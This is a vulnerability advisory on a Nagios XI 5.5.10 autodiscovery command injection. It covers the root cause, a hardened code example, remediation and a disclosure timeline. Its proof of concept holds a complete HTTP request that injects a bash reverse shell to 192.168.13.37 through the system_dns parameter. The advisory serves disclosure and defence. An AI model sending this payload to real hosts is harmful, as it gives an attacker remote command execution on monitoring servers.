Nagios XI 5.5.10 Autodiscovery Authenticated Remote Code Execution

Summary

Command injection in Nagios XI before 5.5.11 allows authenticated users to execute arbitrary remote commands via a new autodiscovery job.

Product description (from vendor)

“[Nagios XI] Provides monitoring of all mission-critical infrastructure components including applications, services, operating systems, network protocols, systems metrics, and network infrastructure. Hundreds of third-party addons provide for monitoring of virtually all in-house applications, services, and systems”. For more information visit https://www.nagios.com/products/nagios-xi/.

CVE(s)

Details

Root cause analysis

Autodiscovery jobs allow a user to set up a scheduled scan of a specific subnet, along with many other options. That functionality resides in nagiosxi/basedir/html/includes/components/autodiscovery/autodiscovery.inc.php, where the function autodiscovery_component_get_cmdline handles the user-provided parameters and returns the shell command to run:

<?php

function autodiscovery_component_get_cmdline($jobid){
    [...]
    
--> $system_dns = grab_array_var($jarr, "system_dns", "off");
    
    [...]

    if ($system_dns == "on") {
        $system_dns = "--system-dns=1";
    }

    [...]
    
--> $cmd = "rm -f " . $xml_file . "; touch " . $watch_file . "; sudo /usr/bin/php " . $script_dir . "autodiscover_new.php --addresses=\"" . escapeshellcmd($address) . "\"  --exclude=\"" . escapeshellcmd($exclude_address) . "\" --output=" . $xml_file . " --watch=" . $watch_file . " --onlynew=0 --debug=1 " . $osd . " " . $topod . " " . $scan_delay . " " . $system_dns . " > " . $out_file . " 2>&1 & echo $!";

    return $cmd;
}

Since system_dns is neither validated nor sanitized (any value other than the literal "on" is concatenated into $cmd unchanged), sending a crafted system_dns HTTP POST parameter to this endpoint makes it possible to gain arbitrary command execution on the Nagios XI host.
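For comparison, a hardened way to build the same command line, written here as an added example (it is not the vendor's 5.5.11 patch, which this advisory did not verify): boolean options are mapped to fixed flags instead of being echoed, free-form values are validated and then quoted with escapeshellarg(), and the script directory and file paths are placeholders.

```php
<?php
// Added example: hardened construction of the autodiscovery command line.
// Not Nagios XI code; field names follow the vulnerable function above.

function build_autodiscovery_cmdline(array $jarr, string $script_dir,
                                     string $xml_file, string $watch_file,
                                     string $out_file): string
{
    // Boolean-ish option: select a fixed flag, never interpolate the raw value.
    // Anything other than the literal "on" is treated as off.
    $system_dns = (($jarr['system_dns'] ?? 'off') === 'on') ? '--system-dns=1' : '';

    // Free-form values: reject anything outside an address/CIDR/range charset
    // before it reaches the shell ...
    $address = $jarr['address'] ?? '';
    $exclude = $jarr['exclude_address'] ?? '';
    $allowed = '/^[0-9a-fA-F.:\/,\s-]*$/';
    if (!preg_match($allowed, $address) || !preg_match($allowed, $exclude)) {
        throw new InvalidArgumentException('invalid address list');
    }

    // ... and quote every argument with escapeshellarg(), which wraps it in
    // single quotes so ; & | $ > and friends are plain characters.
    $parts = [
        'sudo', '/usr/bin/php', $script_dir . 'autodiscover_new.php',
        '--addresses=' . $address,
        '--exclude=' . $exclude,
        '--output=' . $xml_file,
        '--watch=' . $watch_file,
        '--onlynew=0', '--debug=1',
    ];
    if ($system_dns !== '') {
        $parts[] = $system_dns;
    }
    return 'rm -f ' . escapeshellarg($xml_file) . '; touch ' . escapeshellarg($watch_file) . '; '
         . implode(' ', array_map('escapeshellarg', $parts))
         . ' > ' . escapeshellarg($out_file) . ' 2>&1 & echo $!';
}

// Constructed job parameters with an injection attempt in system_dns: the
// value no longer reaches the command at all, it simply selects "off".
$job = ['address' => '192.168.1', 'exclude_address' => '', 'system_dns' => ';id;'];
echo build_autodiscovery_cmdline($job, '/path/to/scripts/',      // placeholder paths
                                 '/tmp/job.xml', '/tmp/job.watch', '/tmp/job.out'), PHP_EOL;
```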

Proof of concept

  1. Edit the following HTTP request with the correct cookie and reverse shell parameters and send it:
POST /nagiosxi/includes/components/autodiscovery/?mode=newjob HTTP/1.1
Host: nagiosxi.local
Content-Type: application/x-www-form-urlencoded
Content-Length: 310
Connection: close
Cookie: nagiosxi=8rspko6npt4lkfqcvo9u5i70b2

update=1&job=-1&nsp=d333dca41f296fae9327eecdce86332176ed6bfc82c352e3276751ecedd6f172&address=192.168.1&exclude_address=&frequency=Once&hour=09&minute=00&ampm=AM&dayofweek=1&dayofmonth=1&os_detection=on&scandelay=&system_dns=%3bbash+-i+>%26+/dev/tcp/192.168.13.37/31337+0>%261%3b&topology_detection=&updateButton=
  2. Notice a TCP reverse shell is spawned with Nagios XI privileges.

Impact

An authenticated attacker with autodiscovery job creation privileges can gain remote code execution on the Nagios XI host.

Remediation

Upgrade to Nagios XI 5.5.11 or later. (Note: we didn’t verify the patch.)

Disclosure timeline

This report was subject to Shielder’s disclosure policy:

  • 20/02/2019:
    • Vulnerability report is sent to vendor
    • Vendor acknowledges issue and begins triage process
  • 28/02/2019: Vendor releases Nagios XI 5.5.11
  • 10/04/2019: Shielder’s advisory is made public

Credits

`polict` of Shielder

Date

10 April 2019